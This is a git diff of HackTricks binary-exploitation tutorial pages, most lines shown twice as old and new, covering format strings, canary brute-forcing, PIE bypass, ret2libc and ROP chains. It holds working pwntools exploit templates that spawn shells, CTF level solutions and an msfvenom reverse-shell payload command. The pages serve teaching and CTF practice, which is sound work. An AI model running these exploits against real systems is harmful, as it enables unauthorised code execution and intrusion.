\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` \`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\`
#### **Format String Exploit Template** ## **Format String Exploit Template**
You can find a **template** to exploit the GOT using format-strings here: You can find a **template** to exploit the GOT using format-strings here:
@ -450,7 +449,7 @@ You an find a **template** to exploit the GOT using format-strings here:
[format-strings-template.md](format-strings-template.md) [format-strings-template.md](format-strings-template.md)
{% endcontent-ref %} {% endcontent-ref %}
#### **.fini\_array** ## **.fini\_array**
Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**. Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**.
@ -467,7 +466,7 @@ Contents of section .fini_array:
Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln. Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln.
#### **Format Strings to Dump Content** ## **Format Strings to Dump Content**
A format string can also be abused to **dump content** from the memory of the program.\ A format string can also be abused to **dump content** from the memory of the program.\
For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**: For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**:
@ -486,7 +485,7 @@ So, **accessing** the **8th parameter** you can get the flag:
Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**! Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**!
#### **DTOR** ## **DTOR**
{% hint style="danger" %} {% hint style="danger" %}
Nowadays it is very **rare to find a binary with a dtor section**. Nowadays it is very **rare to find a binary with a dtor section**.
@ -503,12 +502,12 @@ rabin -s /exec | grep “__DTOR”
Usually you will find the **DTOR** section **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it. Usually you will find the **DTOR** section **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it.
#### **Format Strings to Buffer Overflows** ## **Format Strings to Buffer Overflows**
The **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\ The **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\
For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow.
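Python's `%`-formatting follows C's `printf` closely enough here to sanity-check the payload length:

```python
# "%.44x" pads the converted value to 44 characters, so the expanded
# payload is 44 + 4 = 48 bytes - enough to overflow a 44-byte buffer.
payload = ("%.44x" % 0) + "AAAA"
assert len(payload) == 48
```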
#### **\_\_atexit Structures** ## **\_\_atexit Structures**
{% hint style="danger" %} {% hint style="danger" %}
Nowadays it is very **rare to exploit this**. Nowadays it is very **rare to exploit this**.
@ -519,7 +518,7 @@ If you can **modify** the **address** of any of these **functions** to point to
Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64\_86**.\ Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64\_86**.\
The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector. The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector.
#### **setjmp() & longjmp()** ## **setjmp() & longjmp()**
{% hint style="danger" %} {% hint style="danger" %}
Nowadays it is very **rare to exploit this**. Nowadays it is very **rare to exploit this**.
@ -538,7 +537,7 @@ Each class has a **Vtable** which is an array of **pointers to methods**.
Each object of a **class** has a **VPtr** which is a **pointer** to the Vtable of its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode. Each object of a **class** has a **VPtr** which is a **pointer** to the Vtable of its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode.
### **Preventive measures and evasions** # **Preventive measures and evasions**
**ASLR not so random** **ASLR not so random**
@ -592,7 +591,7 @@ Si se usa la función execve() después de fork(), se sobreescribe el espacio y
**Relocation Read-Only (RELRO)** **Relocation Read-Only (RELRO)**
#### Relro ## Relro
**Relro (Read only Relocation)** affects the memory permissions similar to NX. The difference is whereas with NX it makes the stack non-executable, RELRO makes **certain things read only** so we **can't write** to them. The most common way I've seen this be an obstacle is preventing us from doing a **`got` table overwrite**, which will be covered later. The `got` table holds addresses for libc functions so that the binary knows what the addresses are and can call them. Let's see what the memory permissions look like for a `got` table entry for a binary with and without relro. **Relro (Read only Relocation)** affects the memory permissions similar to NX. The difference is whereas with NX it makes the stack non-executable, RELRO makes **certain things read only** so we **can't write** to them. The most common way I've seen this be an obstacle is preventing us from doing a **`got` table overwrite**, which will be covered later. The `got` table holds addresses for libc functions so that the binary knows what the addresses are and can call them. Let's see what the memory permissions look like for a `got` table entry for a binary with and without relro.
@ -744,7 +743,7 @@ Memcheck\
RAD (Return Address Defender)\ RAD (Return Address Defender)\
Insure++ Insure++
### **8 Heap Overflows: Basic exploits** # **8 Heap Overflows: Basic exploits**
**Allocated chunk** **Allocated chunk**
@ -863,7 +862,7 @@ En caso de querer volver a usar uno se asignaría sin problemas. En caso de quer
A previously freed pointer is used again without control. A previously freed pointer is used again without control.
### **8 Heap Overflows: Advanced exploits** # **8 Heap Overflows: Advanced exploits**
The Unlink() and FrontLink() techniques were eliminated when the unlink() function was modified. The Unlink() and FrontLink() techniques were eliminated when the unlink() function was modified.
@ -1079,12 +1078,12 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu
**objdump -p -/exec**\ **objdump -p -/exec**\
**Info functions strncmp —>** Info about the function in gdb **Info functions strncmp —>** Info about the function in gdb
### Interesting courses # Interesting courses
* [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io) * [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io)
* [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE) * [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)
### **References** # **References**
* [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html) * [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)
View file
@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Bypassing Canary & PIE
**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** **If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
![](<../../.gitbook/assets/image (144).png>) ![](<../../.gitbook/assets/image (144).png>)
@ -28,13 +26,13 @@ Note that **`checksec`** might not find that a binary is protected by a canary i
However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting. However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.
{% endhint %} {% endhint %}
## Brute force Canary # Brute force Canary
The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**. The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**.
Then, the best way to bypass the canary is just to **brute-force it byte by byte**, and you can figure out whether a guessed canary byte was correct by checking if the program crashed or continues its regular flow. In this example the function **brute-forces an 8-byte canary (x64)** and distinguishes between a correctly guessed byte and a bad one just by **checking** whether a **response** is sent back by the server (in **other situations** you could use a **try/except**): Then, the best way to bypass the canary is just to **brute-force it byte by byte**, and you can figure out whether a guessed canary byte was correct by checking if the program crashed or continues its regular flow. In this example the function **brute-forces an 8-byte canary (x64)** and distinguishes between a correctly guessed byte and a bad one just by **checking** whether a **response** is sent back by the server (in **other situations** you could use a **try/except**):
### Example 1 ## Example 1
This example is implemented for 64bits but could be easily implemented for 32 bits. This example is implemented for 64bits but could be easily implemented for 32 bits.
@ -77,7 +75,7 @@ base_canary = get_bf(base) #Get junk data + canary base_canary = get_bf(base) #Get junk data + canary
CANARY = u64(base_canary[len(base_canary)-8:]) #Get the canary CANARY = u64(base_canary[len(base_canary)-8:]) #Get the canary
``` ```
### Example 2 ## Example 2
This is implemented for 32 bits, but this could be easily changed to 64bits.\ This is implemented for 32 bits, but this could be easily changed to 64bits.\
Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload. Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.
@ -123,7 +121,7 @@ canary = breakCanary()
log.info(f"The canary is: {canary}") log.info(f"The canary is: {canary}")
``` ```
## Print Canary # Print Canary
Another way to bypass the canary is to **print it**.\ Another way to bypass the canary is to **print it**.\
Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\ Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\
@ -133,7 +131,7 @@ With this info the attacker can **craft and send a new attack** knowing the cana
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\ Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\
CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html) CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
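The recovery step can be sketched like this (the padding length and leaked bytes are made-up example values):

```python
# Sketch: rebuild the canary from a puts() leak. The overflow overwrites the
# canary's leading null byte so puts prints through the 7 random bytes; the
# known \x00 is then prepended again. Offsets/values here are examples.
def recover_canary(leak: bytes, pad_len: int) -> int:
    random_part = leak[pad_len:pad_len + 7]   # the 7 leaked canary bytes
    canary = b"\x00" + random_part            # canary always starts with \x00
    return int.from_bytes(canary, "little")

leak = b"A" * 40 + bytes.fromhex("11223344556677")
canary = recover_canary(leak, 40)
```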
## PIE # PIE
In order to bypass PIE you need to **leak some address**. If the binary is not leaking any addresses, the best option is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\ In order to bypass PIE you need to **leak some address**. If the binary is not leaking any addresses, the best option is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\
For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**
@ -149,7 +147,7 @@ base_canary_rbp_rip = get_bf(base_canary_rbp)
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
``` ```
### Get base address ## Get base address
The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.
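For example (the addresses and the static offset below are placeholders; look up the offset of the leaked return address in your binary with `objdump`/`gdb`):

```python
# Sketch: derive the PIE base from the leaked saved RIP. OFFSET is the
# static offset of that return address inside the ELF - an assumed value
# you must look up yourself (objdump -d ./binary).
RIP = 0x55555555529a          # leaked saved return address (example)
OFFSET = 0x129a               # static offset of that instruction (example)
base = RIP - OFFSET
assert base & 0xfff == 0      # PIE bases are page-aligned
```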
View file
@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Format Strings Template
```python ```python
from pwn import * from pwn import *
from time import sleep from time import sleep
#################### ###################
#### CONNECTION #### ### CONNECTION ####
#################### ###################
# Define how you want to exploit the binary # Define how you want to exploit the binary
LOCAL = True LOCAL = True
@ -72,9 +70,9 @@ def connect_binary():
ROP_LOADED = ROP(elf)# Find ROP gadgets ROP_LOADED = ROP(elf)# Find ROP gadgets
######################################## #######################################
#### Get format string configuration ### ### Get format string configuration ###
######################################## #######################################
def send_payload(payload): def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
View file
@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Fusion # Level00
## Level00
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
@ -52,7 +50,7 @@ r.send(buf)
r.interactive() r.interactive()
``` ```
## Level01 # Level01
```python ```python
from pwn import * from pwn import *
View file
@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Ret2Lib
**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.** **If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.**
## If you are **inside** the **host** # If you are **inside** the **host**
### You can find the **address of lib**c ## You can find the **address of lib**c
```bash ```bash
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time) ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
@ -35,19 +33,19 @@ If you want to check if the ASLR is changing the address of libc you can do:
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
``` ```
### Get offset of system function ## Get offset of system function
```bash ```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
``` ```
### Get offset of "/bin/sh" ## Get offset of "/bin/sh"
```bash ```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
``` ```
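With the libc base (e.g. from `/proc/<PID>/maps`) and those offsets, the final addresses are just additions. The offsets below are example values, not universal ones:

```python
# Final addresses = libc base + offsets. All values below are examples;
# get your own from /proc/<PID>/maps, readelf and strings as shown above.
LIBC_BASE  = 0xb75dc000   # base of libc in the target process
SYSTEM_OFF = 0x0003ada0   # offset of system() from readelf
BINSH_OFF  = 0x0015ba0b   # offset of the "/bin/sh" string from strings

system_addr = LIBC_BASE + SYSTEM_OFF
binsh_addr  = LIBC_BASE + BINSH_OFF
```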
### /proc/\<PID>/maps ## /proc/\<PID>/maps
If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root). If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root).
@ -57,7 +55,7 @@ Here you can find **exactly where is the libc loaded** inside the process and **
In this case it is loaded in **0xb75dc000** (This will be the base address of libc) In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
### Using gdb-peda ## Using gdb-peda
Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda: Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda:
@ -67,7 +65,7 @@ p exit
find "/bin/sh" find "/bin/sh"
``` ```
## Bypassing ASLR # Bypassing ASLR
You can try to brute-force the base address of libc. You can try to brute-force the base address of libc.
@ -75,7 +73,7 @@ You can try to bruteforce the abse address of libc.
for off in range(0xb7000000, 0xb8000000, 0x1000):
```
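The loop above works because mmap bases are page-aligned, so the search space is small. A sketch of how few guesses that really is (the `system` offset is a hypothetical placeholder):

```python
# Hypothetical offset of system() for the target libc build
SYSTEM_OFFSET = 0x03ada0

# Every candidate libc base in the usual 32-bit mmap range, one per 0x1000 page
candidate_bases = range(0xb7000000, 0xb8000000, 0x1000)
candidate_system = [base + SYSTEM_OFFSET for base in candidate_bases]

print(len(candidate_system))  # 0x1000000 / 0x1000 = 4096 guesses at most
```

Each guess is then used as the return address against the service; a wrong guess just crashes the child and you try the next one.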
## Code

```python
from pwn import *


@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# ROP - Leaking LIBC address

## Quick Resume
1. **Find** the overflow **offset**
2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets
3. Use the previous gadgets to **leak the memory address** of puts or another libc function and **find the libc version** ([download it](https://libc.blukat.me))
4. With the library, **calculate the ROP and exploit it**
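The first stage of that plan (steps 1-3) boils down to a single payload. A sketch using `struct.pack` in place of pwntools' `p64`, with all addresses as hypothetical placeholders:

```python
import struct

p64 = lambda v: struct.pack("<Q", v)  # little-endian 8-byte pack, like pwntools' p64

# Hypothetical addresses; in the real exploit they come from pwntools/ROPgadget
OFFSET   = b"A" * 40
POP_RDI  = 0x4006b3   # pop rdi ; ret
PUTS_GOT = 0x601018   # elf.got['puts']  -> argument passed to puts
PUTS_PLT = 0x400520   # elf.plt['puts']  -> function actually called
MAIN_PLT = 0x400567   # return to main afterwards for a second overflow

# puts(got.puts) prints the real libc address of puts, then main() runs again
rop1 = OFFSET + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
print(len(rop1))  # 40 bytes of padding + 4 qwords = 72 bytes
```

Returning to `main` is what makes step 4 possible: the process is still alive, so a second overflow can deliver the `system("/bin/sh")` chain computed from the leak.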
## Other tutorials and binaries to practice

This tutorial is going to exploit the code/binary proposed here: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
Other useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
## Code

Filename: `vuln.c`
@ -51,7 +49,7 @@ int main() {
gcc -o vuln vuln.c -fno-stack-protector -no-pie
```
## ROP - Leaking LIBC template

I'm going to use the code located here to make the exploit.\
Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
@ -60,14 +58,14 @@ Download the exploit and place it in the same directory as the vulnerable binary
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %}
## 1- Finding the offset

The template needs an offset before continuing with the exploit. If none is provided, it will execute the necessary code to find it (by default `OFFSET = ""`):
```bash
####################
#### Find offset ###
####################
OFFSET = ""#"A"*72
if OFFSET == "":
    gdb.attach(p.pid, "c") #Attach and continue
@ -93,7 +91,7 @@ After finding the offset (in this case 40) change the OFFSET variable inside the
Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern search $rsp` from GEF.
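The idea behind those patterns is that every short substring is unique, so the bytes that land in the overwritten register identify the offset directly. A minimal, self-contained reimplementation of the Metasploit-style pattern (a sketch, not the real `pattern create` tool):

```python
import string

def pattern_create(length):
    # Metasploit-style cyclic pattern: Aa0Aa1Aa2...Ab0... built from 3-char chunks
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def pattern_offset(crash_bytes, length=1000):
    # crash_bytes: the characters that ended up in the overwritten register
    return pattern_create(length).find(crash_bytes)

print(pattern_offset("Aa5A"))
```

For a 64-bit crash you would search for the 4 printable characters found at `$rsp`, exactly like `pattern seach $rsp` does in GEF.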
## 2- Finding Gadgets

Now we need to find ROP gadgets inside the binary. These ROP gadgets will be useful to call `puts` to find the **libc** being used, and later to **launch the final exploit**.
@ -114,7 +112,7 @@ The **POP\_RDI** is needed to **pass** a **parameter** to the called function.
In this step you don't need to execute anything as everything will be found by pwntools during the execution.
## 3- Finding LIBC library

Now it's time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts` and then **search** in which **library version** the puts function is at that address.
@ -165,14 +163,14 @@ This way we have **tricked puts function** to **print** out the **address** in *
As we are **exploiting** a **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
But, in a remote exploit case I will explain here how you can find it:
### 3.1- Searching for libc version (1)

You can search which library is being used in this web page: [https://libc.blukat.me/](https://libc.blukat.me)\
It will also allow you to download the discovered version of **libc**

![](<../../../.gitbook/assets/image (142).png>)
### 3.2- Searching for libc version (2)

You can also do:
@ -207,7 +205,7 @@ Getting libc6_2.23-0ubuntu10_amd64
Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory.
### 3.3- Other functions to leak

```python
puts
read
gets
```
## 4- Finding base libc address & exploiting

At this point we should know the libc library used. As we are exploiting a local binary I will just use `/lib/x86_64-linux-gnu/libc.so.6`
@ -256,7 +254,7 @@ rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
p.clean()
p.sendline(rop2)

##### Interact with the shell #####
p.interactive() #Interact with the connection
```
@ -268,7 +266,7 @@ Finally, the **address of exit function** is **called** so the process **exists
![](<../../../.gitbook/assets/image (143).png>)
## 4(2)- Using ONE\_GADGET

You could also use [**ONE\_GADGET**](https://github.com/david942j/one\_gadget) to obtain a shell instead of using **system** and **"/bin/sh"**. **ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \
However, normally there are some constraints; the most common ones, and the easiest to avoid, look like `[rsp+0x30] == NULL`. As you control the values on the stack pointed to by **RSP**, you just have to send some more NULL values so the constraint is satisfied.
@ -280,7 +278,7 @@ ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100
```
## EXPLOIT FILE

You can find a template to exploit this vulnerability here:
@ -288,9 +286,9 @@ You can find a template to exploit this vulnerability here:
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %}
## Common problems

### MAIN\_PLT = elf.symbols\['main'] not found

If the "main" symbol does not exist, you can find where the main code is:
@ -306,11 +304,11 @@ and set the address manually:
MAIN_PLT = 0x401080
```
### Puts not found

If the binary is not using `puts`, check which output function it is using instead.

### `sh: 1: %s%s%s%s%s%s%s%s: not found`

If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`


@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# ROP - Leaking LIBC template
{% code title="template.py" %}
```python
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools

####################
#### CONNECTION ####
####################
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
@ -61,9 +59,9 @@ if GDB and not REMOTETTCP and not REMOTESSH:
##########################
##### OFFSET FINDER ######
##########################
OFFSET = b"" #b"A"*264
if OFFSET == b"":
@ -79,9 +77,9 @@ if OFFSET == b"":
#####################
#### Find Gadgets ###
#####################
try:
    libc_func = "puts"
    PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
@ -99,9 +97,9 @@ log.info("pop rdi; ret gadget: " + hex(POP_RDI))
log.info("ret gadget: " + hex(RET))

#########################
#### Find LIBC offset ###
#########################
def generate_payload_aligned(rop):
    payload1 = OFFSET + rop
@ -157,11 +155,11 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
##############################
##### FINAL EXPLOITATION #####
##############################

### Via One_gadget (https://github.com/david942j/one_gadget)
# gem install one_gadget
def get_one_gadgets(libc):
    import string, subprocess
@ -183,7 +181,7 @@ if USE_ONE_GADGET:
    if one_gadgets:
        rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fulfill the constraints

### Normal/Long exploitation
if not rop2:
    BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
    SYSTEM = LIBC.sym["system"]
@ -205,9 +203,9 @@ P.interactive() #Interact with your shell :)
```
{% endcode %}
## Common problems

### MAIN\_PLT = elf.symbols\['main'] not found

If the "main" symbol does not exist, you can find where the main code is:
@ -223,11 +221,11 @@ and set the address manually:
MAIN_PLT = 0x401080
```

### Puts not found

If the binary is not using `puts`, check which output function it is using instead.

### `sh: 1: %s%s%s%s%s%s%s%s: not found`

If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`


@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# ROP - call sys\_execve
In order to prepare the call for the **syscall** the following configuration is needed:

* `rax: 59 Specify sys_execve`
@ -28,7 +26,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
So, basically, it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack).

## Control the registers

Let's start by finding **how to control those registers**:
@ -42,9 +40,9 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
With these addresses it's possible to **write the content in the stack and load it into the registers**.

## Write string

### Writable memory

First you need to find a writable place in the memory
@ -57,7 +55,7 @@ Start End Offset Perm Path
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
```

### Write String

Then you need to find a way to write arbitrary content to this address
@ -66,7 +64,7 @@ ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```

#### 32 bits

```python
'''
@ -90,7 +88,7 @@ rop += p32(0x6b6000 + 4)
rop += writeGadget
```

#### 64 bits

```python
'''
@ -108,7 +106,7 @@ rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```
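With the string written, the final chain just loads each register from the stack and jumps to a `syscall` gadget, matching the register list at the top of this page. A sketch with `struct.pack` standing in for pwntools' `p64` (all gadget addresses are hypothetical placeholders, to be replaced with ROPgadget output):

```python
import struct

p64 = lambda v: struct.pack("<Q", v)

# Hypothetical gadget addresses: find the real ones with ROPgadget as shown above
POP_RAX   = 0x415664   # pop rax ; ret
POP_RDI   = 0x400686   # pop rdi ; ret
POP_RSI   = 0x4101f3   # pop rsi ; ret
POP_RDX   = 0x44326e   # pop rdx ; ret
SYSCALL   = 0x40129c   # syscall
BINSH_PTR = 0x6b6000   # writable address where "/bin/sh\x00" was written

# execve("/bin/sh", 0, 0): rax=59, rdi=&"/bin/sh", rsi=0, rdx=0
rop  = p64(POP_RAX) + p64(59)
rop += p64(POP_RDI) + p64(BINSH_PTR)
rop += p64(POP_RSI) + p64(0)
rop += p64(POP_RDX) + p64(0)
rop += p64(SYSCALL)

print(len(rop))  # 9 qwords = 72 bytes
```

This chain goes after the padding and the write-string gadgets; the full exploit in the next section does the same thing with pwntools.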
## Example

```python
from pwn import *
@ -177,7 +175,7 @@ target.sendline(payload)
target.interactive()
```

## References

* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)


@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Exploiting Tools

## Metasploit
```
pattern_create.rb -l 3000 #Length
@ -29,27 +27,27 @@ nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
```
### Shellcodes

```
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
```
## GDB

### Install

```
apt-get install gdb
```
### Parameters

**-q** --> Do not show banner\
**-x \<file>** --> Auto-execute GDB instructions from here\
**-p \<pid>** --> Attach to process
#### Instructions

\> **disassemble main** --> Disassemble the function\
\> **disassemble 0x12345678**\
@ -92,7 +90,7 @@ apt-get install gdb
* **x/xw \&pointer** --> Address where the pointer is located
* **x/i $eip** —> Instructions of the EIP

### [GEF](https://github.com/hugsy/gef)
```bash
checksec #Check protections
